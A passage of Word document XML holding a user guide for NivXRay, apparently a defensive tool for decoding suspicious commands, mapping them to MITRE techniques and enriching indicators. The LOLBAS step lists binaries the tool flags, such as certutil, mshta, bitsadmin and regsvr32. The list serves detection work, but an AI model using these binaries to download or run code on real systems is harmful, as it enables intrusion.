    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Open the WORKSPACE tab. Nothing is decoded yet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: You should see the left operations sidebar (97 encoders/decoders), the INPUT card in the centre, and the OUTPUT card on the right. The status line reads 0 chars · 0 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — Input panel — where you paste</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Paste the raw suspicious command into the large INPUT textarea. Accepts plain text, hex, base64, URL-encoded — anything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Character count updates live. NivXRay's magic detector runs asynchronously and hints at the likely encoding (e.g., "looks like Base64").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Action bar — the four buttons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Four buttons above the input drive every analysis. From left to right — `NIVXRAY DECODE` (default one-click), `AUTO INVESTIGATE` (full SOC pipeline), `MAGIC DECODE` (deterministic-only), `CLEAR`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: All four are always visible. Advanced options live behind the ⋯ chevron next to CLEAR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Output panel — the decoded plaintext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click NIVXRAY DECODE. Within 1–2 seconds the OUTPUT card populates with the plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: The output supports Copy · Hex · Base64 · Diff views. IOCs, URLs and MITRE ATT&amp;CK IDs are highlighted inline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 5 — Decoding Chain — the stages that fired</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Below OUTPUT is the CHAIN card. It shows every decoder stage in order (Base64 → UTF-16LE → …).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Each stage row shows the operation name, a mini before/after preview, and a click-through to open that stage in the Recipe editor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 6 — GRAPH tab — the Attack Graph</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click GRAPH in the Threat Analysis panel (top-right). This is a Cytoscape-rendered graph of the entire investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Nodes are colour-coded (input · decoded stage · IOC · verdict). Edges are labelled by the decoder that transformed them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 7 — MITRE tab — technique mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click MITRE. Every TTP that the decoded payload maps to is listed with its full name, tactic and confidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Techniques cluster by tactic (Execution / Command-and-Control / Defense Evasion). Click a chip to filter the GRAPH tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 8 — LOLBAS tab — living-off-the-land binaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click LOLBAS. Any powershell, certutil, mshta, bitsadmin, msbuild, regsvr32, etc. found in the decoded output is listed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Each entry shows the binary, the intent (Download · Execute · Persistence), and a link to the LOLBAS.io reference page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 9 — RULES tab — Sigma / YARA hits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click RULES. Both community and custom rules that matched are shown here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Rule name, severity, confidence and the exact substring that triggered the hit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 10 — IOCS tab — extracted indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click IOCS. Every URL, IP, domain, hash, mutex or email address found in the decoded output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Click the 🛈 next to any IOC to fetch VT / OTX / AbuseIPDB verdicts inline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 11 — TI-HITS tab — threat-intel matches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click TI-HITS. Any IOC that already matches a known-bad indicator in your enrichment cache is surfaced first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Includes the source (VT · OTX · AbuseIPDB · custom), confidence and first-seen date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 12 — OSINT tab — related open-source signals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click OSINT. Non-IOC context — Twitter mentions, GitHub PoCs, MITRE technique write-ups, CTI reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Each entry has source, date, and one-line summary. Great for hunting related campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 13 — AI tab — LLM tiebreaker rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click AI. When the deterministic engine wasn't sure, the LLM was asked why one candidate should win.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Shows the model (Claude Sonnet 4.5), its per-candidate score, and the natural-language justification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 14 — FLOW tab — sequential timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click FLOW. A linear "what happened when" timeline of every stage — decode, enrich, verdict.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Great for handing off an investigation — one glance = the full analyst story.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 15 — CHAIN tab — machine-readable chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click CHAIN. The same chain as in the OUTPUT panel but with per-stage confidence, entropy delta and reasoning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Copy-friendly JSON view for pasting into a ticket or notebook.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threat_intel_enrichment, investigation_timeline, auto_investigate, base64_decode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>NivXRay Workspace Tour · Getting Started</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A visual walkthrough of the Analyst Workspace — paste, decode, inspect, understand the Threat Analysis, Chain, Flow, and Graph views. Read this first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 1 — Open the Workspace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click WORKSPACE in the top nav. This is the analyst's main screen — everything happens here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: An empty input textarea on the left, output/results area on the right, and a row of action buttons at the top.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — Paste a suspicious command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Paste the encoded blob into the large input textarea in the centre of the screen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: The status line shows the number of characters detected and (for Base64) the auto-detected format hint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Run Smart Decode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click the green SMART DECODE button in the top action bar. NivXRay picks the best decoder chain automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Within 1–2 seconds the OUTPUT panel populates with the decoded plaintext and a chain of stages appears below (Base64 → UTF-16LE → …).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Open the Candidate Explorer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click SHOW CANDIDATE EXPLORER (right side of the results). Every candidate encoding is scored with structured reasons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: A ranked list of candidates (Base64 wins, Base58/ROT13 lose). Each loser shows a "why not" panel with severity chips.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 5 — Read the Threat Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Look at the verdict card in the top-right — verdict (Malicious / Suspicious / Benign) plus confidence bar, MITRE ATT&amp;CK chips, and extracted IOCs (URLs, IPs, domains).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: The verdict card, IOC chips, and MITRE technique chips are all visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 6 — Inspect the Investigation Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Scroll down to the INVESTIGATION TIMELINE section. Every event (decode, correction, benchmark run, enrichment lookup, TAXII push) is logged in chronological order.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: A vertical timeline card with at least one entry (the decode you just ran).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20926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investigation_timeline, auto_investigate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Features by Category</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Regression Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: regression_dashboard   ·   category: Admin   ·   audience: admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Auto-benchmark the entire regression corpus against the live decoder and highlight flips vs the previous run.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Before promoting any sample-library change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>After tuning a decoder heuristic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>As part of the release checklist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The promotion gate is 100% pass rate — /training/confusion/promote returns HTTP 409 when the last run had any failures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Every correction promoted with `promote_to_corpus=true` auto-triggers a benchmark run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>The historical run strip shows the pass-rate trend at a glance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: correction_flow, sample_library, learning_correction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TAXII 2.1 Push</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: taxii_push   ·   category: Admin   ·   audience: admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Publish extracted IOCs as STIX 2.1 indicator objects to a configurable TAXII 2.1 server.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Sharing indicators with your ISAC or upstream feed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Pushing to a MISP-connected TAXII bridge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Automating your intel-sharing workflow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url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ipv4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ipv6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>email</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>md5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>sha1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>sha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>file-name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Auth modes supported — none / basic / bearer / custom header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Failed pushes are recorded in the push log with the exact URL and error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Test discovery FIRST via the "Test Connection" button before pushing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>The bundle always includes an `identity` object identifying NivXRay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: threat_intel_enrichment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Analyst Workbench</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Auto-Investigate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: auto_investigate   ·   category: Analyst Workbench   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chain the deterministic decoder + reasoning engine + threat-intel + MITRE mapper into a one-click investigation.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Triaging a large volume of alerts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Any time you would run the same decoding + enrichment steps manually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Combine with the Candidate Explorer when the auto-verdict is ambiguous</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Results land on the Investigation Timeline for later replay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: candidate_explorer, threat_intel_enrichment,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Candidate Explorer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: candidate_explorer   ·   category: Analyst Workbench   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Show every candidate encoding scored dynamically against your input with per-candidate evidence and structured why-not breakdowns.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When the winner looks wrong and you need to see the runners-up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Investigating ambiguous inputs (base32 vs base58 vs base62)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Learning why a certain decoder was chosen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Confidence = weighted sum of alphabet, length, entropy, decode success, printable ratio, linguistic score, file signature, malware indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Runners-up carry `rejection_reasons` with severity (high/medium/low)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Click "CORRECT THIS" to submit a correction and (optionally) promote the input to the regression corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>IOC chips are enrichable — click 🛈 to fetch VT/OTX/AbuseIPDB verdicts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: correction_flow, threat_intel_enrichment,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Analyst Correction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: correction_flow   ·   category: Analyst Workbench   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Record when the engine got a decode wrong and optionally promote the correction into the versioned regression corpus.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Engine produced the wrong output OR the correct output via the wrong chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>You want to guarantee this input never regresses again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Check "Promote to regression corpus" to make this a permanent regression fixture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Check "Trigger benchmark immediately" to see live pass/fail flips right after promoting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: regression_dashboard, learning_correction,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Investigation Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: investigation_timeline   ·   category: Analyst Workbench   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
